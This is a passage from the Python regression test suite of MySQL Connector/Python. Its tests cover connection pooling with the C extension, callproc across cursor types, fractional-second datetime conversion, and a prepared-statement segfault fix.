"".format(self.table_name, "', '".join(test_values)))
cur.execute("SELECT my_blob, my_longblob, my_json, my_text FROM {}"
"".format(self.table_name))
res = cur.fetchall()
self.assertEqual(res[0], expected_values)
cur.execute("DROP TABLE IF EXISTS {}".format(self.table_name))
cur.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 3),
"MySQL >= 5.7.3 is required for reset command")
@unittest.skipIf(CMySQLConnection is None,
"CMySQLConnection is required but is not available")
class Bug27489937(tests.MySQLConnectorTests):
"""BUG#27489937: SUPPORT C EXTENSION FOR CONNECTION POOLS
"""
def setUp(self):
self.config = tests.get_mysql_config()
self.config['pool_name'] = 'Bug27489937'
self.config['pool_size'] = 3
self.config['use_pure'] = False
try:
del mysql.connector._CONNECTION_POOLS[self.config['pool_name']]
except:
pass
def tearDown(self):
# Remove pools created by test
del mysql.connector._CONNECTION_POOLS[self.config['pool_name']]
def test_cext_pool_support(self):
"""Basic pool tests"""
cnx_list = []
session_ids = []
for _ in range(self.config['pool_size']):
cnx = mysql.connector.connect(**self.config)
self.assertIsInstance(cnx, PooledMySQLConnection,
"Expected a CMySQLConnection instance")
self.assertIsInstance(cnx._cnx, CMySQLConnection,
"Expected a CMySQLConnection instance")
cnx_list.append(cnx)
exp_session_id = cnx.connection_id
session_ids.append(exp_session_id)
cnx.cmd_query("SET @ham = 2")
cnx.cmd_reset_connection()
cnx.cmd_query("SELECT @ham")
self.assertEqual(exp_session_id, cnx.connection_id)
exp = ('2',) if PY2 else (b'2',)
self.assertNotEqual(exp, cnx.get_rows()[0][0])
self.assertRaises(errors.PoolError, mysql.connector.connect,
**self.config)
for cnx in cnx_list:
cnx.close()
cnx = mysql.connector.connect(**self.config)
cnx.cmd_query("SELECT @ham")
self.assertIn(cnx.connection_id, session_ids,
"Pooled connection was not reused.")
exp = ('2',) if PY2 else (b'2',)
self.assertNotEqual(exp, cnx.get_rows()[0][0])
class BugOra29195610(tests.MySQLConnectorTests):
"""BUG#29195610: CALLPROC() NOT SUPPORTED WITH NAMED TUPLE CURSOR AND FOR
DICT CURSOR IS IGNORED
"""
def setUp(self):
config = tests.get_mysql_config()
with connection.MySQLConnection(**config) as cnx:
cnx.cmd_query("DROP TABLE IF EXISTS bug29195610")
cnx.cmd_query("DROP PROCEDURE IF EXISTS sp_bug29195610")
cnx.cmd_query("CREATE TABLE bug29195610 (id INT, name VARCHAR(5))")
cnx.cmd_query(
"INSERT INTO bug29195610 (id, name) VALUES (2020, 'Foo')"
)
cnx.cmd_query(
"CREATE PROCEDURE sp_bug29195610 (in_id INT) "
"SELECT id, name FROM bug29195610 WHERE id = in_id;"
)
def tearDown(self):
config = tests.get_mysql_config()
with connection.MySQLConnection(**config) as cnx:
cnx.cmd_query("DROP TABLE IF EXISTS bug29195610")
cnx.cmd_query("DROP PROCEDURE IF EXISTS sp_bug29195610")
@foreach_cnx()
def test_callproc_cursor_types(self):
named_tuple = namedtuple("Row", ["id", "name"])
cases = [
(
{},
[(2020, "Foo")]
),
(
{"buffered": True},
[(2020, "Foo")]
),
(
{"raw": True},
[(bytearray(b"2020"), bytearray(b"Foo"))]
),
(
{"raw": True, "buffered": True},
[(bytearray(b"2020"), bytearray(b"Foo"))]
),
(
{"raw": True, "buffered": True},
[(bytearray(b"2020"), bytearray(b"Foo"))]
),
(
{"dictionary": True},
[{"id": 2020, "name": "Foo"}]
),
(
{"dictionary": True, "buffered": True},
[{"id": 2020, "name": "Foo"}]
),
(
{"named_tuple": True},
[named_tuple(2020, "Foo")]
),
(
{"named_tuple": True, "buffered": True},
[named_tuple(2020, "Foo")]
)
]
for cursor_type, exp in cases:
with self.cnx.cursor(**cursor_type) as cur:
cur.callproc("sp_bug29195610", (2020,))
for res in cur.stored_results():
self.assertEqual(exp, res.fetchall())
with self.cnx.cursor(prepared=True) as cur:
self.assertRaises(errors.NotSupportedError,
cur.callproc, 'sp_bug29195610', (2020,))
class BugOra24938411(tests.MySQLConnectorTests):
"""BUG#24938411: FIX MICROSECOND CONVERSION FROM MYSQL DATETIME TO PYTHON
DATETIME.
"""
@tests.foreach_cnx()
def test_datetime_fractional(self):
with self.cnx.cursor() as cur:
cur.execute("DROP TABLE IF EXISTS bug24938411")
cur.execute(
"CREATE TABLE bug24938411 "
"(mydate datetime(3) DEFAULT NULL) ENGINE=InnoDB"
)
cur.execute(
'INSERT INTO bug24938411 (mydate) '
'VALUES ("2020-01-01 01:01:01.543")'
)
cur.execute(
"SELECT mydate, CAST(mydate AS CHAR) AS mydate_char "
"FROM bug24938411"
)
row = cur.fetchone()
self.assertEqual(row[0], datetime(2020, 1, 1, 1, 1, 1, 543000))
self.assertEqual(row[1], "2020-01-01 01:01:01.543")
cur.execute("DROP TABLE IF EXISTS bug24938411")
class BugOra32165864(tests.MySQLConnectorTests):
"""BUG#32165864: SEGMENTATION FAULT WHEN TWO PREPARED STATEMENTS WITH
INCORRECT SQL SYNTAX ARE EXECUTED CONSECUTIVELY.
"""
@foreach_cnx()
def test_segfault_prepared_statement(self):
with self.cnx.cursor() as cur:
cur.execute("DROP TABLE IF EXISTS bug32165864")
cur.execute(
"CREATE TABLE bug32165864 "
"(id INT, name VARCHAR(10), address VARCHAR(20))"
)
cur.execute(
"INSERT INTO bug32165864 (id, name, address) VALUES "
"(1, 'Joe', 'Street 1'), (2, 'John', 'Street 2')"
)
self.cnx.commit()
stmt = "SELECT * FROM customer WHERE i = ? ?"
with self.cnx.cursor(prepared=True) as cur:
for _ in range(10):
self.assertRaises(
errors.Error, cur.execute, stmt, (10, "Gabriela")
)
with self.cnx.cursor() as cur:
cur.execute("DROP TABLE IF EXISTS bug32165864")